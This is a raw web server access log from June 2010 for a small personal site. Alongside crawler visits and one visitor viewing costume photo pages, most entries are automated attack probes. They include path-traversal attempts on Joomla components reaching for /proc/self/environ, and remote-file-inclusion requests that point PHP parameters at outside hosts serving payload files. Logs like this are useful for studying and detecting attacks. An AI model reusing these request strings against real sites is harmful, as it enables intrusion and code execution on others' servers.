85.236.50.166 - - [26/Jun/2010:22:02:31 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.13.84 - - [26/Jun/2010:22:05:12 -0500] "GET /logs/access_log.1261526400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.238 - - [26/Jun/2010:22:09:10 -0500] "GET /logs/access_log.1195603200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.46 - - [26/Jun/2010:22:10:10 -0500] "GET /logs/access_log.1232064000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.40.246.135 - - [26/Jun/2010:22:13:15 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
188.40.246.135 - - [26/Jun/2010:22:13:15 -0500] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.91.250.11 - - [26/Jun/2010:22:13:50 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:22:13:52 -0500] "GET /logs/access_log.1266710400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:22:13:52 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:22:13:52 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:22:13:54 -0500] "GET /logs/access_log.1266710400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
64.91.250.11 - - [26/Jun/2010:22:13:54 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:22:14:34 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:22:14:34 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:22:14:34 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:16:41 -0500] "GET /logs/access_log.1266710400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:16:41 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:16:41 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.249.53.187 - - [26/Jun/2010:22:18:33 -0500] "GET /tattoo HTTP/1.1" 301 330 "-""Mozilla/5.0 http://fairshare.cc (X11; U; FreeBSD i386; en-US; rv:1.2a) Gecko/20021021"
209.249.53.187 - - [26/Jun/2010:22:18:34 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 http://fairshare.cc (X11; U; FreeBSD i386; en-US; rv:1.2a) Gecko/20021021"
67.30.129.57 - - [26/Jun/2010:22:21:43 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:22:21:44 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.30.129.57 - - [26/Jun/2010:22:21:44 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:22:49 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:22:49 -0500] "GET /logs/access_log.1266710400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
93.186.192.124 - - [26/Jun/2010:22:22:49 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.199.45 - - [26/Jun/2010:22:25:11 -0500] "GET /logs/access_log.1253404800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.171.37.206 - - [26/Jun/2010:22:29:16 -0500] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
213.171.37.206 - - [26/Jun/2010:22:29:16 -0500] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
213.171.37.206 - - [26/Jun/2010:22:29:16 -0500] "GET /logs/access_log.1275264000/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.808"
213.171.37.206 - - [26/Jun/2010:22:29:40 -0500] "GET /logs/access_log.1275264000%20/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
188.40.246.135 - - [26/Jun/2010:22:30:24 -0500] "GET //index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.46.204.182 - - [26/Jun/2010:22:35:41 -0500] "GET /?S=D HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.252.241 - - [26/Jun/2010:22:35:45 -0500] "GET /logs/access_log.1215907200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [26/Jun/2010:22:38:15 -0500] "GET /logs/access_log.1241049600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.41.233.128 - - [26/Jun/2010:22:43:28 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:22:43:48 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:44:18 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:44:42 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:22:46:35 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:47:06 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
207.46.199.182 - - [26/Jun/2010:22:49:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.231.187.33 - - [26/Jun/2010:22:49:41 -0500] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
193.231.187.33 - - [26/Jun/2010:22:49:43 -0500] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
188.40.246.135 - - [26/Jun/2010:22:50:00 -0500] "GET /logs/access_log.1275868800//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:50:01 -0500] "GET //index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:50:01 -0500] "GET /logs//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:50:03 -0500] "GET /logs/access_log.1275609600//index2.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:51:32 -0500] "GET /logs/access_log.1274832000///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:51:32 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:51:33 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:52:03 -0500] "GET /logs/access_log.1274832000///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:52:03 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:52:03 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
174.142.75.205 - - [26/Jun/2010:22:54:47 -0500] "GET /logs/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
174.142.75.205 - - [26/Jun/2010:22:54:47 -0500] "GET /images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
174.142.75.205 - - [26/Jun/2010:22:54:47 -0500] "GET /logs/access_log.1276473600/images/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:22:54:47 -0500] "GET /logs/access_log.1275264000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 354 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:22:54:47 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:22:54:47 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 332 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:22:56:40 -0500] "GET /logs/access_log.1274832000///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:22:56:40 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:22:56:40 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:22:57:07 -0500] "GET /logs/access_log.1275264000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 354 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:22:57:07 -0500] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 327 "-""libwww-perl/5.805"
67.59.156.163 - - [26/Jun/2010:22:57:07 -0500] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://imstechzone.com//id.jpg HTTP/1.1" 404 332 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:22:58:10 -0500] "GET /logs/access_log.1275091200///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:22:59:56 -0500] "GET /logs/access_log.1276732800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:23:01:15 -0500] "GET /logs/access_log.1275868800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:23:01:16 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:23:01:16 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:23:01:16 -0500] "GET /logs/access_log.1276732800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
188.40.246.135 - - [26/Jun/2010:23:01:42 -0500] "GET /logs/access_log.1275782400///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
71.202.43.150 - - [26/Jun/2010:23:04:47 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:04:47 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:04:51 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:04:51 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:04:52 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:04:52 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:04:58 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:01 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:02 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:02 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:02 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:02 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:03 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:03 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:03 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:03 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:03 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:03 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:04 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:04 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:29 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:30 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.1" 200 46400 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:30 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.1" 200 46731 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:30 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.1" 200 46480 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:30 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.1" 200 49303 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:30 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.1" 200 47808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:31 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.1" 200 43788 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:31 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.1" 200 45534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:31 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.1" 200 46286 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:31 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.1" 200 46590 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:32 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.1" 200 46201 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.202.43.150 - - [26/Jun/2010:23:05:32 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.1" 200 50534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.41.233.128 - - [26/Jun/2010:23:06:18 -0500] "GET /logs/access_log.1274400000///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:23:06:18 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:23:06:18 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:23:06:55 -0500] "GET /logs/access_log.1274832000///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:23:06:55 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:23:06:55 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
78.41.233.128 - - [26/Jun/2010:23:07:52 -0500] "GET /logs/access_log.1276732800///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
202.62.103.120 - - [26/Jun/2010:23:09:39 -0500] "GET //functions_mod_user.php?phpbb_root_path=http://chinese.ncue.edu.tw//appserv/AUTHORS.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.834"
